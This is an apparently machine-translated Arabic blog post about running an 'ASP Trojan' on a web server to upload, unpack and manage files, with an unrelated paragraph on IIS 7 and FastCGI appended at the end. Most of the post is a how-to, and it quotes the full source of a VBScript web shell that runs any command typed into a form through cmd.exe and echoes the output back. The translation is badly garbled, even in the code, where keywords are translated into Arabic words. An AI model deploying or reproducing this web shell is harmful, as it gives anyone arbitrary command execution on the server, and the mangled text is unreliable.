موصى به: كيفية تشغيل ASP على منصات غير Windows نظرًا لأن Microsoft أطلقت تقنية ASP ، فقد تم استخدام ASP على نطاق واسع على المزيد والمزيد من مواقع الإنترنت/intranet/extranet ، وخاصة عمليات قاعدة البيانات ، نظرًا لوظائفها القوية في إنشاء مواقع تفاعلية ديناميكية وبساطتها في رمز الكتابة.
أعتقد أن كل شخص لديه بعض اللوحة بالميناء 80. إذا كان محليًا ، فلا تنظر إلى الأمان. إذا كنت لا تريد أن تنظر إلى الأسفل ، فقد تنظر أيضًا. أنا قبيح جدًا لمحاولة جذب الانتباه.
إن أكثر الأشياء إثارة للقلق حول وضع موقع ويب على شعاع هو تحديث وتحميل عدد كبير من الملفات. يتم اكتشاف الخدمات الطرفية بسهولة خلال وضح النهار ، وأنت لست مرتاحًا عند فتح FTP. ذهبت حول الإنترنت ووجدت أنه يمكن تحقيقه بسهولة من خلال الجمع بين التحميل الخالي من المكونات وأحصنة طروادة ASP.
الجميع على دراية بـ ASP Trojan. إنه ليس أكثر من CMD. ما هي الوظيفة؟ لا تقلق ، استمع إلي ببطء. الفكرة العامة هي تحميل برنامج ASP بدون مكون من خلال FTP أو 139 أو Winshell. لقد اخترت WebEdit (في الواقع ، لم تعد هذه أداة تحميل بسيطة خالية من المكونات. من خلال ذلك ، يمكنك تعديل ، حذف الملفات/الدلائل ، واستخدامها لتحديث الصفحات. لدي إعلان. ليس لدي أقارب معه. أخيرًا ، لقد أومأت زجاجة طيران ... متابعة) و ASP Trojan (إذا ، أنا في الواقع مختور. تذكر أنه عليك استخدام دليل الويب الخاص بشواء. في الواقع ، يمكن حل معظم المشكلات ، ولكن إذا كان هناك العديد من الملفات التي تم تحميلها واحدة تلو الأخرى ، فسيكون ذلك مزعجًا. ماذا علي أن أفعل؟ الآن يتم استخدام طروادة ASP. ابحث عن rar.exe (قد يتم تثبيت جميع الدلائل التي تم تثبيتها باستخدام WinRar على اللاحم. ربما تم تثبيته بالفعل. إذا كانت أداة إلغاء الضغط في سطر الأوامر ، فهي أيضًا على ما يرام) نسخها إلى ٪ systemroot ٪/system32/. قم بتحميل ملف .zip أو .rar إلى دليل الويب الخاص بشواء. افتح حصان ASP Trojan (يسمى مؤقتًا Trojan.asp) في شريط عنوان المتصفح ، أدخل RAR -X Source.rar Path في مربع النص لإلغاء الضغط بنجاح ، V ، وببطء ، كيفية الحصول على المسار المطلق (المسار) لدليل الويب؟ لقد استخدمت الطريقة المحلية لتعديل trojan.asp وأضف سطرًا لتحويل الدليل الظاهري إلى مسار مطلق وإخراج العبارة <٪ = server.mappath (.) ٪>. يمكنك تغييره إلى أي دليل افتراضي نسبي في الإرادة.
إنه يوفر فكرة فقط. إذا كان بإمكان أي رجل عظيم كتابة تخفيف الضغط ASP ، فسيكون ذلك أفضل ، ولكن؟ من يمكنه فعل ذلك؟ لا أعرف ، أليس كذلك؟ أما بالنسبة لكيفية إخفاء الدليل الافتراضي ودعم العرض الصيني المبسط ، فليس مناقشة في هذه المقالة. يقول المثل القديم ، السلامة أولاً ، عادةً ما يضع منتدى صغيرًا أو غرفة دردشة. إذا وضعت حقًا صفحة منزلية شخصية وتركت عنوان الاتصال ورقم هاتفك للآخرين ، فلن يكون ذلك جيدًا. يوصي Ps.Junesun بالجعل في تقليل الذات مباشرة ، لا أعرف ما إذا كان مربع الحوار سيظهر.
| ما يلي هو المحتوى المقتبس: < ٪@ لغة = vbscript ٪ > < ٪ قاتمة أوسريبت Dim OscriptNet قاتمة أوليسيس ، فتيل Dim SZCMD ، Sztempfile عند استئناف الخطأ التالي < " - قم بإنشاء كائنات COM التي سنستخدمها -" set Oscript = server.createObject (wscript.shell) setscriptnet = server.createBject (wscript.network) set offileSys = server.createObject (scripting.filesystemObject) < " - تحقق من أمر نشرناه -" szcmd = request.form (.cmd) إذا (szcmd <>) ثم < " - استخدم أنبوب الرجل الفقير ... ملف مؤقت -" sztempfile = c:/ & OfileSys.getTempname () Call Oscript.run (cmd.exe /c & szcmd & > & sztempfile ، 0 ، true) set ofile = ofileSys.OpentExtFile (sztempfile ، 1 ، false ، 0) < نهاية إذا < ٪ > < HTML > < الجسم > < إجراء نموذج = < ٪ = request.ServerVariables (url) ٪ > method = post > < نوع الإدخال = اسم النص = .cmd size = 45 value = < ٪ = szcmd ٪ >> < نوع الإدخال = إرسال قيمة = تشغيل > </form > < قبل > < < ٪ إذا (isObject (forile)) ثم " - اقرأ الإخراج من أمرنا وإزالة ملف temp -" عند استئناف الخطأ التالي استجابة. write server.htmlencode (forile.readall) forile.close call forilesys.deletefile (sztempfile ، true) إنهاء إذا ٪ > </الجسم > </html > |
مشاركة: هدف Apache IIS7 وافتح ذراعيك لفتح المصدر لقد اتخذت Microsoft خيالًا لمزايا وحدات Apache العالية. قال إريك ديلي ، مدير المشروع الأول لفريق IIS في Microsoft ، إنهم يعملون على تقليد هذه الميزة في IIS 7.0. إن أكبر تغيير في IIS7.0 مقارنة بالإصدارات السابقة هو أنه يدعم فتحات مفتوحة المصدر متعددة أصلاً من خلال FastCGI.